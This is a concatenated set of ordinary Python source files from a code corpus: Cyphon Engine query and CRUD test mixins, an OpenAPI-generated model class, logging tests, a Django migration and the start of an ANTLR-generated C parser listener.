# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cyphon Engine. If not, see <http://www.gnu.org/licenses/>.
"""
"""
# standard library
from datetime import timedelta
import json
# third party
from django.utils import timezone
# local
from cyphon.fieldsets import QueryFieldset
from bottler.datafields.models import DataField
from engines.queries import EngineQuery
from engines.sorter import SortParam, Sorter
class CRUDTestCaseMixin(object):
"""
Mixin for use with an a EngineBaseTestCase subclass. Provides tests
for the CRUD methods of an Engine subclass.
"""
def test_insert(self):
"""
Tests the insert method.
"""
test_text = 'this is an insert test post'
doc_id = self.engine.insert({'text': test_text})
result = self.engine.find_by_id(doc_id)
self.assertEqual(self._get_id([result], 0), doc_id)
self.assertEqual(self._get_doc([result], 0)['text'], test_text)
def test_find_by_id_single(self):
"""
Tests the find_by_id method for a single document.
"""
test_text1 = 'this is a find_by_id test post'
test_text2 = 'this is another find_by_id test post'
doc_id1 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'text': test_text1
})
doc_id2 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 2
},
'text': test_text2
})
result = self.engine.find_by_id(doc_id1) # leave out doc_id2
self.assertEqual(self._get_id([result], 0), doc_id1)
self.assertEqual(self._get_doc([result], 0)['text'], test_text1)
def test_find_by_id_single_no_match(self):
"""
Tests the find_by_id method for a single document id that doesn't match
any documents.
"""
actual = self.engine.find_by_id(1)
self.assertEqual(actual, None)
def test_find_by_id_multiple(self):
"""
Tests the find_by_id method for multiple documents.
"""
test_text1 = 'this is a find_by_id test post'
test_text2 = 'this is another find_by_id test post'
test_text3 = 'yet another test post'
doc_id1 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'text': test_text1
})
doc_id2 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 2
},
'text': test_text2
})
doc_id3 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 3
},
'text': test_text3
})
results = self.engine.find_by_id([doc_id1, doc_id2]) # leave out doc_id3
expected_ids = [doc_id1, doc_id2]
self.assertEqual(len(results), 2)
self.assertIn(self._get_id(results, 0), expected_ids)
self.assertIn(self._get_id(results, 1), expected_ids)
self.assertEqual(self._get_doc(results, 0)['text'], test_text1)
self.assertEqual(self._get_doc(results, 1)['text'], test_text2)
def test_find_by_id_multi_no_match(self):
"""
Tests the find_by_id method for multiple document ids that don't
match any documents.
"""
actual = self.engine.find_by_id([1, 2])
self.assertEqual(actual, None)
def test_remove_by_id_single(self):
"""
Tests the remove_by_id method for a single document.
"""
test_text = 'this is a remove_by_id test post'
doc_id = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'text': test_text
})
results = self.engine.find_by_id([doc_id])
self.assertEqual(len(results), 1)
self.engine.remove_by_id(doc_id)
results = self.engine.find_by_id([doc_id])
self.assertEqual(results, None)
def test_remove_by_id_multiple(self):
"""
Tests the remove_by_id method for multiple documents.
"""
doc_id1 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'text': 'a remove_by_id test post'
})
doc_id2 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 2
},
'text': 'another remove_by_id test post'
})
results = self.engine.find_by_id([doc_id1, doc_id2])
self.assertEqual(len(results), 2)
self.engine.remove_by_id([doc_id1, doc_id2])
results = self.engine.find_by_id([doc_id1, doc_id2])
self.assertEqual(results, None)
class FilterTestCaseMixin(object):
"""
Mixin for use with a EngineBaseTestCase subclass to test the find() method
of an Engine subclass. Provides tests for the standard set of query
selectors (eq, gte, etc.) that are used in defining queries.
"""
time = timezone.now()
test_docs = [
{
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'_saved_date': time - timedelta(days=1),
'user': {
'screen_name': 'john',
'email': 'john@example.com',
'link': 'http://www.acme.com/john',
'age': 20,
'last_login': '2015-10-21 14:46:44.329193-04'
},
'content': {
'text': 'I like cats.',
'tags': ['cats', 'pets']
},
'location': [75.0, 25.0]
},
{
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 2
},
'_saved_date': time,
'user': {
'screen_name': 'jane',
'email': 'jane@example.com',
'link': 'http://www.acme.com/jane',
'age': 30,
'last_login': None
},
'content': {
'text': 'I like dogs.',
'tags': ['dogs', 'pets']
},
'location': [25.0, 25.0]
},
{
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 3
},
'_saved_date': time + timedelta(days=1),
'user': {
'screen_name': 'jack',
'email': 'jack@example.com',
'link': 'http://www.acme.com/jack',
'age': 30
},
'content': {
'text': 'I LIKE CATS AND DOGS.',
'tags': ['cats', 'dogs', 'pets']
}
}
]
polygon1 = {
'type': 'Feature',
'geometry': {
'type': 'Polygon',
'coordinates': [
[[50.0, 0.0], [100.0, 0.0], [100.0, 50.0],
[50.0, 50.0], [50.0, 0.0]]
]
}
}
polygon2 = {
'type': 'Feature',
'geometry': {
'type': 'Polygon',
'coordinates': [
[[0.0, 0.0], [100.0, 0.0], [100.0, 0.0],
[00.0, 50.0], [0.0, 0.0]]
]
}
}
nonpolygon = {
'type': 'Feature',
'geometry': {
'type': 'Point',
'coordinates': [100.0, 0.5]
},
}
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='cat'
),
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='dog'
)
]
timeframe = [
QueryFieldset(
field_name='_saved_date',
field_type='DateTimeField',
operator='gte',
value=time
),
QueryFieldset(
field_name='_saved_date',
field_type='DateTimeField',
operator='lte',
value=time + timedelta(days=2)
)
]
def test_within_single_polygon(self):
"""
Tests the find method using a 'within' filter for a feature collection
with a single polygon.
"""
features = {
'type': 'FeatureCollection',
'features': [self.polygon1]
}
fieldsets = [
QueryFieldset(
field_name='location',
field_type='PointField',
operator='within',
value=json.dumps(features)
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_name = 'john'
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'],
expected_name)
def test_within_multiple_polygons(self):
"""
Tests the find method using a 'within' filter for a feature collection
with more than one polygon.
"""
features = {
'type': 'FeatureCollection',
'features': [self.polygon1, self.polygon2]
}
fieldsets = [
QueryFieldset(
field_name='location',
field_type='PointField',
operator='within',
value=json.dumps(features)
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jane']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'],
expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'],
expected_names)
def test_within_non_polygon(self):
"""
Tests the find method using a 'within' filter for a feature collection
that includes a non-polygon feature.
"""
features = {
'type': 'FeatureCollection',
'features': [self.polygon1, self.nonpolygon]
}
fieldsets = [
QueryFieldset(
field_name='location',
field_type='PointField',
operator='within',
value=json.dumps(features)
)
]
with self.assertRaises(ValueError):
query = EngineQuery(fieldsets, 'AND')
self.engine.find(query)
def test_not_missing(self):
"""
Tests the find method using a 'not missing' filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.last_login',
field_type='DateTimeField',
operator='not:missing',
value=''
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_name = 'john'
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'],
expected_name)
def test_regex_with_fragment(self):
"""
Tests the find method using a 'regex' filter.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='cat'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jack']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_regex_with_caps(self):
"""
Tests that 'regex' filter is not case-sensitive.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='CAT'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jack']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_regex_with_multiple_words(self):
"""
Tests the 'regex' filter with multiple words.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='I like cats'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jack']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_regex_unmatched_quote(self):
"""
Tests the find method for a 'regex' filter with a string
containing an unmatched quotation mark.
"""
fieldsets = [
QueryFieldset(
field_name='user.screen_name',
field_type='CharField',
operator='regex',
value='"john'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
self.assertEqual(count, 0)
def test_not_regex_with_fragment(self):
"""
Tests the find method for a 'not:regex' filter with a word fragment.
"""
fieldsets = [
QueryFieldset(
field_name='user.screen_name',
field_type='CharField',
operator='not:regex',
value='ja'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'john')
def test_not_regex_with_multi_words(self):
"""
Tests the find method for a 'not:regex' filter with multiple words.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='not:regex',
value='I like cats and dogs'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jane']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_and(self):
"""
Tests the find method using two query terms joined by 'AND'.
"""
query = EngineQuery(self.fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jack')
def test_or(self):
"""
Tests the find method using two query terms joined by 'OR'.
"""
query = EngineQuery(self.fieldsets, 'OR')
results = self.engine.find(query)
count = results['count']
self.assertEqual(count, 3)
def test_eq_numeric(self):
"""
Tests the find method for an 'eq' (equals) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='eq',
value='20'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'john')
def test_eq_text(self):
"""
Tests the find method for an 'eq' (equals) filter on a CharField.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='eq',
value='I like dogs.'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jane')
def test_eq_email(self):
"""
Tests the find method for an 'eq' (equals) filter on an EmailField.
"""
fieldsets = [
QueryFieldset(
field_name='user.email',
field_type='EmailField',
operator='eq',
value='jane@example.com'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jane')
def test_in(self):
"""
Tests the find method for an 'in' filter.
"""
fieldsets = [
QueryFieldset(
field_name='content.tags',
field_type='ListField',
operator='in',
value='cats'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jack']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_gt(self):
"""
Tests the find method for a 'gt' (greater than) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='gt',
value=20
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
expected_names = ['jane', 'jack']
count = results['count']
docs = results['results']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_gte(self):
"""
Tests the find method for a 'gte' (greater than or equal to) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='gte',
value=20
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
expected_names = ['jane', 'jack']
count = results['count']
docs = results['results']
self.assertEqual(count, 3)
def test_lt(self):
"""
Tests the find method for an 'lt' (less than) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='lt',
value=30
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'john')
def test_lte(self):
"""
Tests the find method for an 'lte' (less than or equal to) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='lte',
value=30
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 3)
def test_not_eq(self):
"""
Tests the find method for a 'not:eq' filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.screen_name',
field_type='CharField',
operator='not:eq',
value='jack'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jane']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_not_in(self):
"""
Tests the find method for a 'not:in' filter.
"""
fieldsets = [
QueryFieldset(
field_name='content.tags',
field_type='CharField',
operator='not:in',
value='cats'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jane')
def test_find_fields(self):
"""
Tests that the find method only returns fields defined in the
Engine's schema.
"""
doc_id = self.engine.insert({
'content': {
'text': 'I like cats and dogs.',
'tags': ['cats', 'dogs'],
},
'user': {
'screen_name': 'Jill',
'email': 'jill@example.com',
},
})
self.engine.schema = [
DataField(
field_name='content.text',
field_type='TextField',
target_type='Keyword'
),
DataField(
field_name='user.screen_name',
field_type='CharField',
target_type='Account'
)
]
fieldsets = [
QueryFieldset(
field_name='user.screen_name',
field_type='CharField',
operator='eq',
value='Jill'
)
]
query = EngineQuery(fieldsets, 'AND')
actual = self.engine.find(query)
expected = {
'count': 1,
'results': [
{
'_id': doc_id,
'content': {
'text': 'I like cats and dogs.'
},
'user': {
'screen_name': 'Jill'
}
}
]
}
self.assertEqual(actual, expected)
def test_find_tf_no_tf_and(self):
"""
Tests the find method with no timeframe and an 'AND' joiner.
"""
fieldsets = self.fieldsets
joiner = 'AND'
query = EngineQuery(fieldsets, joiner)
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 1)
self.assertEqual(len(docs), 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jack')
def test_find_tf_no_tf_or(self):
"""
Tests the find method with no timeframe and an 'OR' joiner.
"""
fieldsets = self.fieldsets
joiner = 'OR'
query = EngineQuery(fieldsets, joiner)
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 3)
self.assertEqual(len(docs), 3)
def test_find_tf_w_tf_and(self):
"""
Tests the find method with a timeframe and an 'AND' joiner.
"""
field_query = EngineQuery(self.fieldsets, 'AND')
timeframe = self.timeframe
subqueries = [field_query] + timeframe
query = EngineQuery(subqueries, 'AND')
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 1)
self.assertEqual(len(docs), 1)
def test_find_tf_w_tf_or(self):
"""
Tests the find method with a timeframe and an 'OR' joiner.
"""
field_query = EngineQuery(self.fieldsets, 'OR')
timeframe = self.timeframe
subqueries = [field_query] + timeframe
query = EngineQuery(subqueries, 'AND')
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 2)
self.assertEqual(len(docs), 2)
def test_find_tf_start_time_or(self):
"""
Tests the find method with an endtime and an 'OR' joiner.
"""
field_query = EngineQuery(self.fieldsets, 'OR')
timeframe = [
QueryFieldset(
field_name='_saved_date',
field_type='DateTimeField',
operator='gte',
value=self.time - timedelta(days=2)
)
]
subqueries = [field_query] + timeframe
query = EngineQuery(subqueries, 'AND')
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 3)
self.assertEqual(len(docs), 3)
def test_find_tf_end_time_or(self):
"""
Tests the find method with an endtime and an 'OR' joiner.
"""
field_query = EngineQuery(self.fieldsets, 'OR')
timeframe = [
QueryFieldset(
field_name='_saved_date',
field_type='DateTimeField',
operator='gte',
value=self.time + timedelta(hours=1)
)
]
subqueries = [field_query] + timeframe
query = EngineQuery(subqueries, 'AND')
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 1)
self.assertEqual(len(docs), 1)
def test_find_pagination_sort(self):
"""
Tests pagination and sorting of find results.
"""
sorter = Sorter([
SortParam(
field_name='user.age',
field_type='IntegerField',
order='DESC'
),
SortParam(
field_name='user.screen_name',
field_type='CharField',
order='ASC'
)
])
field_query = EngineQuery(self.fieldsets, 'OR')
results = self.engine.find(
query=field_query,
sorter=sorter,
page=1,
page_size=2
)
docs = results['results']
count = results['count']
self.assertEqual(count, 3)
self.assertEqual(len(docs), 2)
self.assertEqual(docs[0]['user']['screen_name'], 'jack')
results = self.engine.find(
query=field_query,
sorter=sorter,
page=2,
page_size=2
)
docs = results['results']
count = results['count']
self.assertEqual(count, 3)
self.assertEqual(len(docs), 1)
self.assertEqual(docs[0]['user']['screen_name'], 'john')
def test_filter_ids_analyzed(self):
"""
Tests the filter_ids method.
"""
id_0 = self.engine.insert(self.test_docs[0])
id_1 = self.engine.insert(self.test_docs[1])
id_2 = self.engine.insert(self.test_docs[2])
ids = [id_0, id_1, id_2]
actual = self.engine.filter_ids(
doc_ids=ids,
fields=[
DataField(field_name='content.text', field_type='TextField'),
DataField(field_name='content.tags', field_type='ListField')
],
value='CATS'
)
expected = [id_0, id_2]
actual.sort()
expected.sort()
self.assertEqual(actual, expected)
def test_filter_ids_not_analyzed(self):
"""
Tests the filter_ids method for a mixture of exact-text and
full-text fields in ELasticsearch.
"""
id_0 = self.engine.insert(self.test_docs[0])
id_1 = self.engine.insert(self.test_docs[1])
id_2 = self.engine.insert(self.test_docs[2])
ids = [id_0, id_1, id_2]
actual = self.engine.filter_ids(
doc_ids=ids,
fields=[
DataField(field_name='user.link', field_type='URLField'),
DataField(field_name='user.email', field_type='EmailField')
],
value='example'
)
expected = [id_0, id_1, id_2]
actual.sort()
expected.sort()
self.assertEqual(actual, expected)
def test_filter_ids_mixed(self):
"""
Tests the filter_ids method for a mixture of exact-text and
full-text fields in ELasticsearch.
"""
id_0 = self.engine.insert(self.test_docs[0])
id_1 = self.engine.insert(self.test_docs[1])
id_2 = self.engine.insert(self.test_docs[2])
ids = [id_0, id_1, id_2]
actual = self.engine.filter_ids(
doc_ids=ids,
fields=[
DataField(field_name='content.text', field_type='TextField'),
DataField(field_name='user.email', field_type='EmailField')
],
value='example'
)
expected = [id_0, id_1, id_2]
actual.sort()
expected.sort()
self.assertEqual(actual, expected)
| 32 | 84 | 0.517104 |
2ba895283ed55081e6d980725c75439a5723fef5 | 2,515 | py | Python | backend/openapi_server/models/action_call.py | tmdt-buw/gideon | b3e7d0614baf80c149d3ef7f1c80a94339feda4b | [
"Apache-2.0"
] | null | null | null | backend/openapi_server/models/action_call.py | tmdt-buw/gideon | b3e7d0614baf80c149d3ef7f1c80a94339feda4b | [
"Apache-2.0"
] | null | null | null | backend/openapi_server/models/action_call.py | tmdt-buw/gideon | b3e7d0614baf80c149d3ef7f1c80a94339feda4b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.application_action import ApplicationAction
from openapi_server.models.application_state import ApplicationState
from openapi_server import util
from openapi_server.models.application_action import ApplicationAction # noqa: E501
from openapi_server.models.application_state import ApplicationState # noqa: E501
class ActionCall(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, action=None, state=None): # noqa: E501
"""ActionCall - a model defined in OpenAPI
:param action: The action of this ActionCall. # noqa: E501
:type action: ApplicationAction
:param state: The state of this ActionCall. # noqa: E501
:type state: ApplicationState
"""
self.openapi_types = {
'action': ApplicationAction,
'state': ApplicationState
}
self.attribute_map = {
'action': 'action',
'state': 'state'
}
self._action = action
self._state = state
@classmethod
def from_dict(cls, dikt) -> 'ActionCall':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ActionCall of this ActionCall. # noqa: E501
:rtype: ActionCall
"""
return util.deserialize_model(dikt, cls)
@property
def action(self):
"""Gets the action of this ActionCall.
:return: The action of this ActionCall.
:rtype: ApplicationAction
"""
return self._action
@action.setter
def action(self, action):
"""Sets the action of this ActionCall.
:param action: The action of this ActionCall.
:type action: ApplicationAction
"""
self._action = action
@property
def state(self):
"""Gets the state of this ActionCall.
:return: The state of this ActionCall.
:rtype: ApplicationState
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this ActionCall.
:param state: The state of this ActionCall.
:type state: ApplicationState
"""
self._state = state
| 26.473684 | 96 | 0.636978 |
b5f150e2aad0d7f6a828ef872d799287c6fb9d0c | 1,413 | py | Python | tests/test_base.py | mrtovsky/estimium | 66c8bf077c72d487fa937d28a482d36055d0c433 | [
"MIT"
] | 1 | 2020-04-01T16:29:10.000Z | 2020-04-01T16:29:10.000Z | tests/test_base.py | mrtovsky/estimium | 66c8bf077c72d487fa937d28a482d36055d0c433 | [
"MIT"
] | null | null | null | tests/test_base.py | mrtovsky/estimium | 66c8bf077c72d487fa937d28a482d36055d0c433 | [
"MIT"
] | null | null | null | import logging
from typing import Optional
from estimium.base import ClassLogger
class DummyClass(ClassLogger):
"""Dummy class for testing inheritance from ClassLogger."""
def __init__(self, logger: Optional[logging.Logger] = None):
super().__init__(logger=logger)
self.logger.info("Initializing DummyClass")
def run(self):
self.logger.debug("Entering `run` method")
def test_class_logging_with_getting_logger(caplog):
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
dummy = DummyClass()
dummy.run()
assert caplog.record_tuples == [
(
"{}.{}".format(__name__, DummyClass.__name__),
logging.INFO,
"Initializing DummyClass",
),
(
"{}.{}".format(__name__, DummyClass.__name__),
logging.DEBUG,
"Entering `run` method",
),
]
def test_class_logging_with_specifying_logger(caplog):
logger = logging.getLogger("foo")
logger.setLevel(logging.DEBUG)
dummy = DummyClass(logger=logger)
dummy.run()
assert caplog.record_tuples == [
(
"foo.{}".format(DummyClass.__name__),
logging.INFO,
"Initializing DummyClass",
),
(
"foo.{}".format(DummyClass.__name__),
logging.DEBUG,
"Entering `run` method",
),
]
| 24.362069 | 64 | 0.598018 |
edb996bcacfd2204a4766218b03ccd7db781e4b4 | 240 | py | Python | src/gocept/objectquery/tests/objects2.py | gocept/gocept.objectquery | afe02ab029eb1291978ea84e2de1825adb7e5aec | [
"ZPL-2.1"
] | null | null | null | src/gocept/objectquery/tests/objects2.py | gocept/gocept.objectquery | afe02ab029eb1291978ea84e2de1825adb7e5aec | [
"ZPL-2.1"
] | null | null | null | src/gocept/objectquery/tests/objects2.py | gocept/gocept.objectquery | afe02ab029eb1291978ea84e2de1825adb7e5aec | [
"ZPL-2.1"
] | null | null | null | # Copyright (c) 2007-2009 gocept gmbh & co. kg
# See also LICENSE.txt
import persistent
# class definitions for the test db
class Library(persistent.Persistent):
"""This class is used to test querying for module names of classes."""
| 24 | 74 | 0.7375 |
c71b4e41395a8cb5f9c6cf0e5222c47291237334 | 601 | py | Python | risk_management/users/migrations/0004_auto_20180607_1413.py | justin441/risk_management | 2f5f0f62aae34998db7cf4155297ce4f6a8d774e | [
"MIT"
] | null | null | null | risk_management/users/migrations/0004_auto_20180607_1413.py | justin441/risk_management | 2f5f0f62aae34998db7cf4155297ce4f6a8d774e | [
"MIT"
] | null | null | null | risk_management/users/migrations/0004_auto_20180607_1413.py | justin441/risk_management | 2f5f0f62aae34998db7cf4155297ce4f6a8d774e | [
"MIT"
] | null | null | null | # Generated by Django 2.0.6 on 2018-06-07 13:13
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0003_auto_20180607_1340'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='nom',
),
migrations.AlterField(
model_name='user',
name='business_unit',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='employes', to='users.BusinessUnit'),
),
]
| 25.041667 | 131 | 0.615641 |
69974ee0e31051a17146f07eb03e08b3c39d05b5 | 25,797 | py | Python | edk2basetools/Ecc/CParser4/CListener.py | YuweiChen1110/edk2-basetools | cfd05c928492b7ffd1329634cfcb089db995eeca | [
"BSD-2-Clause-Patent"
] | 7 | 2020-09-08T01:16:14.000Z | 2021-12-25T06:32:42.000Z | edk2basetools/Ecc/CParser4/CListener.py | YuweiChen1110/edk2-basetools | cfd05c928492b7ffd1329634cfcb089db995eeca | [
"BSD-2-Clause-Patent"
] | 25 | 2020-11-02T23:28:42.000Z | 2022-03-29T01:57:40.000Z | edk2basetools/Ecc/CParser4/CListener.py | matthewfcarlson/edk2-pytool-base | ddf78ca6e2110f03e020a5bd0ca32b2a463fecff | [
"BSD-2-Clause-Patent"
] | 18 | 2020-09-10T02:54:03.000Z | 2021-11-29T06:41:52.000Z | # Generated from C.g4 by ANTLR 4.7.1
from antlr4 import *
if __name__ is not None and "." in __name__:
from .CParser import CParser
else:
from CParser import CParser
## @file
# The file defines the parser for C source files.
#
# THIS FILE IS AUTO-GENENERATED. PLEASE DON NOT MODIFY THIS FILE.
# This file is generated by running:
# java org.antlr.Tool C.g
#
# Copyright (c) 2009 - 2010, Intel Corporation All rights reserved.
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
import edk2basetools.Ecc.CodeFragment as CodeFragment
import edk2basetools.Ecc.FileProfile as FileProfile
# This class defines a complete listener for a parse tree produced by CParser.
class CListener(ParseTreeListener):
# Enter a parse tree produced by CParser#translation_unit.
# @param ctx Type: CParser.Translation_unitContext
def enterTranslation_unit(self,ctx):
pass
# Exit a parse tree produced by CParser#translation_unit.
# @param ctx Type: CParser.Translation_unitContext
def exitTranslation_unit(self,ctx):
pass
# Enter a parse tree produced by CParser#external_declaration.
# @param ctx Type: CParser.External_declarationContext
def enterExternal_declaration(self,ctx):
pass
# Exit a parse tree produced by CParser#external_declaration.
# @param ctx Type: CParser.External_declarationContext
def exitExternal_declaration(self,ctx):
pass
# Enter a parse tree produced by CParser#function_definition.
# @param ctx Type: CParser.Function_definitionContext
def enterFunction_definition(self,ctx):
pass
# Exit a parse tree produced by CParser#function_definition.
# @param ctx Type: CParser.Function_definitionContext
def exitFunction_definition(self,ctx):
pass
# Enter a parse tree produced by CParser#declaration_specifiers.
# @param ctx Type: CParser.Declaration_specifiersContext
def enterDeclaration_specifiers(self,ctx):
pass
# Exit a parse tree produced by CParser#declaration_specifiers.
# @param ctx Type: CParser.Declaration_specifiersContext
def exitDeclaration_specifiers(self,ctx):
pass
# Enter a parse tree produced by CParser#declaration.
# @param ctx Type: CParser.DeclarationContext
def enterDeclaration(self,ctx):
pass
# Exit a parse tree produced by CParser#declaration.
# @param ctx Type: CParser.DeclarationContext
def exitDeclaration(self,ctx):
pass
# Enter a parse tree produced by CParser#init_declarator_list.
# @param ctx Type: CParser.Init_declarator_listContext
def enterInit_declarator_list(self,ctx):
pass
# Exit a parse tree produced by CParser#init_declarator_list.
# @param ctx Type: CParser.Init_declarator_listContext
def exitInit_declarator_list(self,ctx):
pass
# Enter a parse tree produced by CParser#init_declarator.
# @param ctx Type: CParser.Init_declaratorContext
def enterInit_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#init_declarator.
# @param ctx Type: CParser.Init_declaratorContext
def exitInit_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#storage_class_specifier.
# @param ctx Type: CParser.Storage_class_specifierContext
def enterStorage_class_specifier(self,ctx):
pass
# Exit a parse tree produced by CParser#storage_class_specifier.
# @param ctx Type: CParser.Storage_class_specifierContext
def exitStorage_class_specifier(self,ctx):
pass
